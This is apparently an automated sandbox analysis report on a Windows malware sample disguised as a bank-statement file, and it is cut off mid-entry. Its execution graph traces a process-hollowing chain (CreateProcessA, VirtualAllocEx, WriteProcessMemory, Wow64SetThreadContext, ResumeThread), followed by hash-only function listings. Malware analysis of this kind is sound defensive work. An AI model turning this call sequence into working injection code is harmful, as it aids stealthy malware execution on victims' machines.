                                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                      Has elevated privileges:true
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Disassembly

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:9.5%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:2.4%
                                        Total number of Nodes:291
                                        Total number of Limit Nodes:13
                                        execution_graph 46205 7a36f80 46206 7a3710b 46205->46206 46208 7a36fa6 46205->46208 46208->46206 46209 7a32ff0 46208->46209 46210 7a37200 PostMessageW 46209->46210 46211 7a3726c 46210->46211 46211->46208 46389 15d4668 46390 15d467a 46389->46390 46391 15d4686 46390->46391 46395 15d4778 46390->46395 46400 15d3e34 46391->46400 46393 15d46a5 46396 15d479d 46395->46396 46404 15d4879 46396->46404 46408 15d4888 46396->46408 46401 15d3e3f 46400->46401 46416 15d5c44 46401->46416 46403 15d7048 46403->46393 46406 15d4888 46404->46406 46405 15d498c 46405->46405 46406->46405 46412 15d44b4 46406->46412 46410 15d48af 46408->46410 46409 15d498c 46409->46409 46410->46409 46411 15d44b4 CreateActCtxA 46410->46411 46411->46409 46413 15d5918 CreateActCtxA 46412->46413 46415 15d59db 46413->46415 46417 15d5c4f 46416->46417 46420 15d5c64 46417->46420 46419 15d70ed 46419->46403 46421 15d5c6f 46420->46421 46424 15d5c94 46421->46424 46423 15d71c2 46423->46419 46425 15d5c9f 46424->46425 46426 15d5cc4 2 API calls 46425->46426 46427 15d72c5 46426->46427 46427->46423 46428 55d8a28 46429 55d8a52 46428->46429 46432 55d8514 46429->46432 46431 55d8abb 46433 55d851f 46432->46433 46438 55d96d0 46433->46438 46437 55d9935 46437->46431 46439 55d96db 46438->46439 46440 55dcdd4 2 API calls 46439->46440 46441 55d9914 46440->46441 46442 55d96e0 46441->46442 46443 55d96eb 46442->46443 46444 55dcdd4 2 API calls 46443->46444 46445 55df1b5 46444->46445 46445->46437 46082 154d01c 46083 154d034 46082->46083 46084 154d08e 46083->46084 46087 55d2818 46083->46087 46092 55d2808 46083->46092 46088 55d2845 46087->46088 46089 55d2877 46088->46089 46097 55d2990 46088->46097 46102 55d29a0 46088->46102 46093 55d2818 46092->46093 46094 55d2877 46093->46094 46095 55d2990 2 API calls 46093->46095 46096 55d29a0 2 API calls 46093->46096 46095->46094 46096->46094 46099 55d29a0 46097->46099 46098 55d2a40 46098->46089 46107 55d2a58 46099->46107 46110 55d2a48 46099->46110 46104 55d29b4 46102->46104 46103 55d2a40 46103->46089 46105 55d2a58 2 API calls 46104->46105 46106 55d2a48 2 API calls 46104->46106 46105->46103 46106->46103 46108 55d2a69 46107->46108 46114 55d4012 46107->46114 46108->46098 46111 55d2a58 46110->46111 46112 55d2a69 46111->46112 46113 55d4012 2 API calls 46111->46113 46112->46098 46113->46112 46118 55d4040 46114->46118 46122 55d4030 46114->46122 46115 55d402a 46115->46108 46119 55d4082 46118->46119 46121 55d4089 46118->46121 46120 55d40da CallWindowProcW 46119->46120 46119->46121 46120->46121 46121->46115 46123 55d4040 46122->46123 46124 55d40da CallWindowProcW 46123->46124 46125 55d4089 46123->46125 46124->46125 46125->46115 46212 7a34f8a 46216 7a35dd1 46212->46216 46235 7a35dd8 46212->46235 46213 7a34f43 46217 7a35df2 46216->46217 46218 7a35e16 46217->46218 46254 7a36382 46217->46254 46259 7a364f9 46217->46259 46264 7a363bb 46217->46264 46269 7a36234 46217->46269 46276 7a369f5 46217->46276 46281 7a362b0 46217->46281 46286 7a367ed 46217->46286 46291 7a365ef 46217->46291 46299 7a366a8 46217->46299 46304 7a36289 46217->46304 46309 7a3672b 46217->46309 46314 7a368a4 46217->46314 46319 7a362e7 46217->46319 46324 7a364e7 46217->46324 46332 7a36b60 46217->46332 46336 7a363e0 46217->46336 46218->46213 46236 7a35df2 46235->46236 46237 7a35e16 46236->46237 46238 7a36382 2 API calls 46236->46238 46239 7a363e0 2 API calls 46236->46239 46240 7a36b60 2 API calls 46236->46240 46241 7a364e7 4 API calls 46236->46241 46242 7a362e7 2 API calls 46236->46242 46243 7a368a4 2 API calls 46236->46243 46244 7a3672b 2 API calls 46236->46244 46245 7a36289 2 API calls 46236->46245 46246 7a366a8 2 API calls 46236->46246 46247 7a365ef 4 API calls 46236->46247 46248 7a367ed 2 API calls 46236->46248 46249 7a362b0 2 API calls 46236->46249 46250 7a369f5 2 API calls 46236->46250 46251 7a36234 4 API calls 46236->46251 46252 7a363bb 2 API calls 46236->46252 46253 7a364f9 2 API calls 46236->46253 46237->46213 46238->46237 46239->46237 46240->46237 46241->46237 46242->46237 46243->46237 46244->46237 46245->46237 46246->46237 46247->46237 46248->46237 46249->46237 46250->46237 46251->46237 46252->46237 46253->46237 46255 7a3662d 46254->46255 46341 7a346a0 46255->46341 46345 7a346a8 46255->46345 46256 7a3664b 46260 7a36433 46259->46260 46260->46259 46261 7a36c5b 46260->46261 46349 7a34760 46260->46349 46353 7a34768 46260->46353 46265 7a363da 46264->46265 46267 7a34760 WriteProcessMemory 46265->46267 46268 7a34768 WriteProcessMemory 46265->46268 46266 7a369af 46267->46266 46268->46266 46357 7a349f0 46269->46357 46361 7a349e4 46269->46361 46278 7a36a02 46276->46278 46277 7a36865 46277->46218 46278->46277 46365 7a33cb0 46278->46365 46369 7a33ca8 46278->46369 46282 7a36295 46281->46282 46282->46218 46283 7a362a7 46282->46283 46373 7a34851 46282->46373 46377 7a34858 46282->46377 46289 7a34760 WriteProcessMemory 46286->46289 46290 7a34768 WriteProcessMemory 46286->46290 46287 7a366a1 46287->46286 46288 7a3689e 46287->46288 46288->46218 46289->46287 46290->46287 46292 7a36566 46291->46292 46292->46291 46293 7a36310 46292->46293 46381 7a34191 46292->46381 46385 7a34198 46292->46385 46297 7a33cb0 ResumeThread 46293->46297 46298 7a33ca8 ResumeThread 46293->46298 46294 7a36865 46294->46218 46297->46294 46298->46294 46300 7a36295 46299->46300 46300->46218 46301 7a362a7 46300->46301 46302 7a34851 ReadProcessMemory 46300->46302 46303 7a34858 ReadProcessMemory 46300->46303 46302->46300 46303->46300 46306 7a36295 46304->46306 46305 7a362a7 46306->46218 46306->46305 46307 7a34851 ReadProcessMemory 46306->46307 46308 7a34858 ReadProcessMemory 46306->46308 46307->46306 46308->46306 46310 7a36295 46309->46310 46310->46218 46311 7a362a7 46310->46311 46312 7a34851 ReadProcessMemory 46310->46312 46313 7a34858 ReadProcessMemory 46310->46313 46312->46310 46313->46310 46315 7a36295 46314->46315 46315->46218 46316 7a362a7 46315->46316 46317 7a34851 ReadProcessMemory 46315->46317 46318 7a34858 ReadProcessMemory 46315->46318 46317->46315 46318->46315 46320 7a36310 46319->46320 46322 7a33cb0 ResumeThread 46320->46322 46323 7a33ca8 ResumeThread 46320->46323 46321 7a36865 46321->46218 46322->46321 46323->46321 46325 7a36566 46324->46325 46326 7a36310 46325->46326 46330 7a34191 Wow64SetThreadContext 46325->46330 46331 7a34198 Wow64SetThreadContext 46325->46331 46328 7a33cb0 ResumeThread 46326->46328 46329 7a33ca8 ResumeThread 46326->46329 46327 7a36865 46327->46218 46328->46327 46329->46327 46330->46325 46331->46325 46334 7a34191 Wow64SetThreadContext 46332->46334 46335 7a34198 Wow64SetThreadContext 46332->46335 46333 7a36b7a 46334->46333 46335->46333 46337 7a36295 46336->46337 46337->46218 46338 7a362a7 46337->46338 46339 7a34851 ReadProcessMemory 46337->46339 46340 7a34858 ReadProcessMemory 46337->46340 46339->46337 46340->46337 46342 7a346e8 VirtualAllocEx 46341->46342 46344 7a34725 46342->46344 46344->46256 46346 7a346e8 VirtualAllocEx 46345->46346 46348 7a34725 46346->46348 46348->46256 46350 7a347b0 WriteProcessMemory 46349->46350 46352 7a34807 46350->46352 46352->46260 46354 7a347b0 WriteProcessMemory 46353->46354 46356 7a34807 46354->46356 46356->46260 46358 7a34a79 46357->46358 46358->46358 46359 7a34bde CreateProcessA 46358->46359 46360 7a34c3b 46359->46360 46362 7a34a79 46361->46362 46362->46362 46363 7a34bde CreateProcessA 46362->46363 46364 7a34c3b 46363->46364 46366 7a33cf0 ResumeThread 46365->46366 46368 7a33d21 46366->46368 46368->46277 46370 7a33cb0 ResumeThread 46369->46370 46372 7a33d21 46370->46372 46372->46277 46374 7a348a3 ReadProcessMemory 46373->46374 46376 7a348e7 46374->46376 46376->46282 46378 7a348a3 ReadProcessMemory 46377->46378 46380 7a348e7 46378->46380 46380->46282 46382 7a341dd Wow64SetThreadContext 46381->46382 46384 7a34225 46382->46384 46384->46292 46386 7a341dd Wow64SetThreadContext 46385->46386 46388 7a34225 46386->46388 46388->46292 46126 55de910 46127 55de920 46126->46127 46130 55dcdd4 46127->46130 46129 55de925 46131 55dcddf 46130->46131 46132 55de96e 46131->46132 46135 15d8308 46131->46135 46141 15d5cc4 46131->46141 46132->46129 46136 15d830b 46135->46136 46138 15d85cb 46136->46138 46147 15dac78 46136->46147 46137 15d8609 46137->46132 46138->46137 46151 15dcd78 46138->46151 46142 15d5ccf 46141->46142 46144 15d85cb 46142->46144 46145 15dac78 2 API calls 46142->46145 46143 15d8609 46143->46132 46144->46143 46146 15dcd78 2 API calls 46144->46146 46145->46144 46146->46143 46156 15dacb0 46147->46156 46160 15daca0 46147->46160 46148 15dac8e 46148->46138 46152 15dcd99 46151->46152 46153 15dcdbd 46152->46153 46175 15dcf18 46152->46175 46179 15dcf28 46152->46179 46153->46137 46165 15dada8 46156->46165 46170 15dad97 46156->46170 46157 15dacbf 46157->46148 46161 15dacb0 46160->46161 46163 15dada8 GetModuleHandleW 46161->46163 46164 15dad97 GetModuleHandleW 46161->46164 46162 15dacbf 46162->46148 46163->46162 46164->46162 46166 15dadb9 46165->46166 46167 15daddc 46165->46167 46166->46167 46168 15dafe0 GetModuleHandleW 46166->46168 46167->46157 46169 15db00d 46168->46169 46169->46157 46171 15dadb9 46170->46171 46172 15daddc 46170->46172 46171->46172 46173 15dafe0 GetModuleHandleW 46171->46173 46172->46157 46174 15db00d 46173->46174 46174->46157 46176 15dcf35 46175->46176 46177 15dcf6f 46176->46177 46183 15dbae0 46176->46183 46177->46153 46180 15dcf35 46179->46180 46181 15dcf6f 46180->46181 46182 15dbae0 2 API calls 46180->46182 46181->46153 46182->46181 46184 15dbae5 46183->46184 46186 15ddc88 46184->46186 46187 15dd2dc 46184->46187 46186->46186 46188 15dd2e7 46187->46188 46189 15d5cc4 2 API calls 46188->46189 46190 15ddcf7 46189->46190 46190->46186 46191 15dd040 46192 15dd086 46191->46192 46196 15dd618 46192->46196 46199 15dd628 46192->46199 46193 15dd173 46202 15dd27c 46196->46202 46200 15dd656 46199->46200 46201 15dd27c DuplicateHandle 46199->46201 46200->46193 46201->46200 46203 15dd690 DuplicateHandle 46202->46203 46204 15dd656 46203->46204 46204->46193 46446 15dff60 46450 7570415 46446->46450 46455 7570448 46446->46455 46447 15dff7f 46451 7570476 46450->46451 46453 15d8308 2 API calls 46451->46453 46454 15d5cc4 2 API calls 46451->46454 46452 75704ac 46452->46447 46453->46452 46454->46452 46456 7570476 46455->46456 46458 15d8308 2 API calls 46456->46458 46459 15d5cc4 2 API calls 46456->46459 46457 75704ac 46457->46447 46458->46457 46459->46457

                                        Executed Functions

                                        Function 07574920 Relevance: 2.7, Strings: 2, Instructions: 189COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 322 7574920-7574943 323 7574945 322->323 324 757494a-75749a4 322->324 323->324 327 75749a7 324->327 328 75749ae-75749ca 327->328 329 75749d3-75749d4 328->329 330 75749cc 328->330 333 7574b10-7574b80 329->333 336 75749d9-75749e6 329->336 330->327 331 7574a52-7574a67 330->331 332 7574ae1-7574b0b 330->332 330->333 334 7574a6c-7574a70 330->334 335 7574a9c-7574adc 330->335 330->336 337 7574a09-7574a4d 330->337 331->328 332->328 353 7574b82 call 75760f5 333->353 354 7574b82 call 7575ae1 333->354 355 7574b82 call 7575af0 333->355 356 7574b82 call 757663c 333->356 338 7574a83-7574a8a 334->338 339 7574a72-7574a81 334->339 335->328 347 75749ef-7574a07 336->347 337->328 342 7574a91-7574a97 338->342 339->342 342->328 347->328 352 7574b88-7574b92 353->352 354->352 355->352 356->352
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Te]q$Te]q
                                        • API String ID: 0-3320153681
                                        • Opcode ID: 7e3501ab82ce36d7f625991313e63019ffef97d2fce2177d8f8f012fd5e4ed27
                                        • Instruction ID: 12aec3a1e34667bed0dacc5000a455bb65542c16c19b22a72c76046b4cf39e7c
                                        • Opcode Fuzzy Hash: 7e3501ab82ce36d7f625991313e63019ffef97d2fce2177d8f8f012fd5e4ed27
                                        • Instruction Fuzzy Hash: B18190B4E10219CFDB08CFAAD984AEEFBB2BF89300F20952AD415AB354DB355945CF54
                                        Function 07574912 Relevance: 2.7, Strings: 2, Instructions: 187COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 357 7574912-7574943 358 7574945 357->358 359 757494a-75749a4 357->359 358->359 362 75749a7 359->362 363 75749ae-75749ca 362->363 364 75749d3-75749d4 363->364 365 75749cc 363->365 368 7574b10-7574b80 364->368 371 75749d9-75749e6 364->371 365->362 366 7574a52-7574a67 365->366 367 7574ae1-7574b0b 365->367 365->368 369 7574a6c-7574a70 365->369 370 7574a9c-7574adc 365->370 365->371 372 7574a09-7574a4d 365->372 366->363 367->363 388 7574b82 call 75760f5 368->388 389 7574b82 call 7575ae1 368->389 390 7574b82 call 7575af0 368->390 391 7574b82 call 757663c 368->391 373 7574a83-7574a8a 369->373 374 7574a72-7574a81 369->374 370->363 382 75749ef-7574a07 371->382 372->363 377 7574a91-7574a97 373->377 374->377 377->363 382->363 387 7574b88-7574b92 388->387 389->387 390->387 391->387
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Te]q$Te]q
                                        • API String ID: 0-3320153681
                                        • Opcode ID: e676c741e3ea60f5bf1555b8e5f1af7c8cbd239802df7a469ef4fa2c3a98bee7
                                        • Instruction ID: 2c509ed64d89d56671a4c8c206b03b1807abb2c54e3aedba82ee2c3e4b227939
                                        • Opcode Fuzzy Hash: e676c741e3ea60f5bf1555b8e5f1af7c8cbd239802df7a469ef4fa2c3a98bee7
                                        • Instruction Fuzzy Hash: 7581B1B4E102198FDB08CFE9D984AEEBBF2BF88300F24942AD415AB354DB359905CF54
                                        Function 055D8A22 Relevance: .6, Instructions: 611COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2163631232.00000000055D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_55d0000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a74b6b16b568b7b74d1deb283ffabb554a3992004d627df622ff15eac9acca19
                                        • Instruction ID: 13d4997dd98a9fe681cf643850c5b3c4a460eb701b2b2d44f7a9a6729d6a17e0
                                        • Opcode Fuzzy Hash: a74b6b16b568b7b74d1deb283ffabb554a3992004d627df622ff15eac9acca19
                                        • Instruction Fuzzy Hash: D552F834A01249CFCB54EFA8C894E9DBBB2FF89310F1185A9D409AB365DB35AD85CF50
                                        Function 055D8A28 Relevance: .6, Instructions: 609COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2163631232.00000000055D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_55d0000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 45b458e67ef70cb47382d1a6abcf04155c325e18e5ca6eb8056811ac30b5f43c
                                        • Instruction ID: b7037a8bd84e523c1b807034c733af25e01544805487a051db7ae8522adcdb93
                                        • Opcode Fuzzy Hash: 45b458e67ef70cb47382d1a6abcf04155c325e18e5ca6eb8056811ac30b5f43c
                                        • Instruction Fuzzy Hash: AF52F834A01249CFCB54EFA8C894E9DBBB2FF89310F1185A9D409AB365DB35AD85CF50
                                        Function 055D8514 Relevance: .6, Instructions: 592COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2163631232.00000000055D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_55d0000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 38b366f32689ca238fbcb82bb520c3c90b07a32eb6344c9a59d28932d87d94c3
                                        • Instruction ID: d90c2e61d31c0a971109141cb0814a40ecf61f46e0e6c28abf2943642e2f9072
                                        • Opcode Fuzzy Hash: 38b366f32689ca238fbcb82bb520c3c90b07a32eb6344c9a59d28932d87d94c3
                                        • Instruction Fuzzy Hash: E4525B34A003068FCB14DF28C944B99B7B2FFC9314F2586A9D5596F3A1DB71A986CF81
                                        Function 055D9868 Relevance: .6, Instructions: 578COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2163631232.00000000055D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_55d0000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d42f0b5428f8a5fa8b44a7c67a6bbba2ce4f91e598f710bf41972d26697d077c
                                        • Instruction ID: f37bcf58ded4877d486c9ab5190e1c367e3f4c95fce660c8e15e7d7fb83c6b0e
                                        • Opcode Fuzzy Hash: d42f0b5428f8a5fa8b44a7c67a6bbba2ce4f91e598f710bf41972d26697d077c
                                        • Instruction Fuzzy Hash: ED525C34A003468FCB14DF28C944B99B7B2FFC9314F2586A9D5586F3A1DB71A986CF81
                                        Function 07576909 Relevance: .4, Instructions: 374COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: aede108890c383a5bad3ebf0d4db4eb610b1e051ecc2f6afd7793fbac281f4b3
                                        • Instruction ID: 1e661b4c227dc776c57d11f984d38e5509819d9053a59ad70ae40c92400db2b4
                                        • Opcode Fuzzy Hash: aede108890c383a5bad3ebf0d4db4eb610b1e051ecc2f6afd7793fbac281f4b3
                                        • Instruction Fuzzy Hash: AAE18FB4A2060ADFCB04CF96E4808EEFBB5FF89311F10D56AD516A7254DB349A42CF90
                                        Function 07576993 Relevance: .3, Instructions: 318COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 91a0b38f904e710d41e723ab9596d2e31760b438c0fe95bd23220a3b5e35ee41
                                        • Instruction ID: 7709e2fa0fcce60f24b338f32505a0cac0870051257b497eda62ef74a0354107
                                        • Opcode Fuzzy Hash: 91a0b38f904e710d41e723ab9596d2e31760b438c0fe95bd23220a3b5e35ee41
                                        • Instruction Fuzzy Hash: E1D119B492460ADFCB04CFA6D4858EEFBB2FF89300F14D565D416AB255DB34AA42CF90
                                        Function 075769D8 Relevance: .3, Instructions: 296COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 42e27481a640f1ba8962a0df83a7766f672cc1d7b17d8a7f21d5f2eeddfd032e
                                        • Instruction ID: ea042a98db3a474fbc6cfe7930a896675f775b68351355b2c03f10e7414aeabf
                                        • Opcode Fuzzy Hash: 42e27481a640f1ba8962a0df83a7766f672cc1d7b17d8a7f21d5f2eeddfd032e
                                        • Instruction Fuzzy Hash: 99D1F8B4D2560ADFCB04CFA6D4818AEFBB2FF89300F54D565D416AB254DB34AA42CF90
                                        Function 07576985 Relevance: .3, Instructions: 284COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4d74abc2c150c4f0354bf95217d1715329b1cb76db42b6240cece1d45ff380b5
                                        • Instruction ID: d68f7ec571345ebadd1f99c80ed3b5742c08f2fd4e721e533efc32e52e1fca40
                                        • Opcode Fuzzy Hash: 4d74abc2c150c4f0354bf95217d1715329b1cb76db42b6240cece1d45ff380b5
                                        • Instruction Fuzzy Hash: 1BC10BB4D2160ADFCB04CF96D4818EEFBB2FF89301B54D565D416A7254DB34AA42CF90
                                        Function 0757A900 Relevance: .3, Instructions: 274COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 90e73895f45e16a9e816d36cdd27c1e3384414a77b0cc10bf484e022d8e7b260
                                        • Instruction ID: 5b2c97cbc5640e957ebe3fd4907e8e7a067e975c730f614e477893f3a7309464
                                        • Opcode Fuzzy Hash: 90e73895f45e16a9e816d36cdd27c1e3384414a77b0cc10bf484e022d8e7b260
                                        • Instruction Fuzzy Hash: 7EB105B1D14219DFDB18CFAAD9805DEFBF2BF89210F20D52AD415AB264EB349902CF54
                                        Function 0757A8F0 Relevance: .3, Instructions: 272COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f9f4cdc78e31f7e5d67eb9834285c70ac2f81b5103da6a969dbfc98170d270c6
                                        • Instruction ID: fffd0871405420d7c53755cc194ccf4efdd15106b7676429df6024209f40066c
                                        • Opcode Fuzzy Hash: f9f4cdc78e31f7e5d67eb9834285c70ac2f81b5103da6a969dbfc98170d270c6
                                        • Instruction Fuzzy Hash: 57B1F5B1E14219DFDB18CFAAD9805DEFBF2BF89210F10D52AD415AB264EB349912CF14
                                        Function 0757A0B8 Relevance: .2, Instructions: 184COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cf1e2e8706ba34cf9079e89a635b726ca0222029ae5a30a01a1a3c360619239e
                                        • Instruction ID: 19c190c21b3da3a5038e0a21905546d4a8304343338416fdd9942e9c0df295cf
                                        • Opcode Fuzzy Hash: cf1e2e8706ba34cf9079e89a635b726ca0222029ae5a30a01a1a3c360619239e
                                        • Instruction Fuzzy Hash: 1B71D2B0D15209DFCB04CFAAE5859DEFBB2FB89350F10D42AE516AB264DB349942CF40
                                        Function 0757A0A8 Relevance: .2, Instructions: 181COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8c4771f8a5f3532874c967947bf3b99c55286ea2bf1b90a3a464d790db6c4ca8
                                        • Instruction ID: 9a0f9ae51df285a8af7172cd686fe240a9cc5118233d8cf577d96c03f6bc9118
                                        • Opcode Fuzzy Hash: 8c4771f8a5f3532874c967947bf3b99c55286ea2bf1b90a3a464d790db6c4ca8
                                        • Instruction Fuzzy Hash: 3E71F4B4E15209DFDB04CFAAE4859DEFBB2FB89340F10D42AE416AB264DB349941CF40
                                        Function 07579170 Relevance: .1, Instructions: 141COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 48175d94e30e102e751e2a1f11e58c6d2bbcd76b5425db263002bba85f8fcd5b
                                        • Instruction ID: ad5c536de7736be45f552cc5dd529e2b849a3e74c43d015e0dcfe79c5f900d39
                                        • Opcode Fuzzy Hash: 48175d94e30e102e751e2a1f11e58c6d2bbcd76b5425db263002bba85f8fcd5b
                                        • Instruction Fuzzy Hash: 9F51F4B4E14219DFCB08CFA5E8855EEFBF2FB8A300F10956AE415A7254DB346911CFA4
                                        Function 07579180 Relevance: .1, Instructions: 139COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 095b23d434f9aa7a97e96632ba2decd7d59d3ddf4a306153d21f85608fc002c2
                                        • Instruction ID: 5339c3835fbe0ea5d963eb892a31dcad5049cdd1d0b39509bdf41272e7cfb87f
                                        • Opcode Fuzzy Hash: 095b23d434f9aa7a97e96632ba2decd7d59d3ddf4a306153d21f85608fc002c2
                                        • Instruction Fuzzy Hash: 5251F4B4E14209DFCB04CFA5E8855EEFBF6BB8A300F10D52AE415A7254DB346901CFA4
                                        Function 075770E0 Relevance: .1, Instructions: 92COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a242fd2df02e3dc4764ad42ae9efc3a48e0ed4f447af5b9722d54e1ec26e0b75
                                        • Instruction ID: 48b3b82a98276ee4a25ce9fda980d868b5383142d75d11c8f254f2cd23651d17
                                        • Opcode Fuzzy Hash: a242fd2df02e3dc4764ad42ae9efc3a48e0ed4f447af5b9722d54e1ec26e0b75
                                        • Instruction Fuzzy Hash: D6316AB4E04609EFCB08CFA9E98099DFBF2FF89310F14D5A6D419AB365D6319A01DB40
                                        Function 07575AF0 Relevance: .1, Instructions: 68COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3068bcc90881220db74c85ed225692f627cbc48a3cc9e8462cb0bcd0fdab5fa0
                                        • Instruction ID: 769813979474018fe0eaf58100ac4832113243931a32d26b0543cf3acb901cfd
                                        • Opcode Fuzzy Hash: 3068bcc90881220db74c85ed225692f627cbc48a3cc9e8462cb0bcd0fdab5fa0
                                        • Instruction Fuzzy Hash: C021F3B1E006188BEB18CFAAD8447DEFBF6EFC8310F14C06AD409A6254DB355A45CF90
                                        Function 07575AE1 Relevance: .1, Instructions: 63COMMON
                                        Download Yara Rule
                                        Memory Dump Source
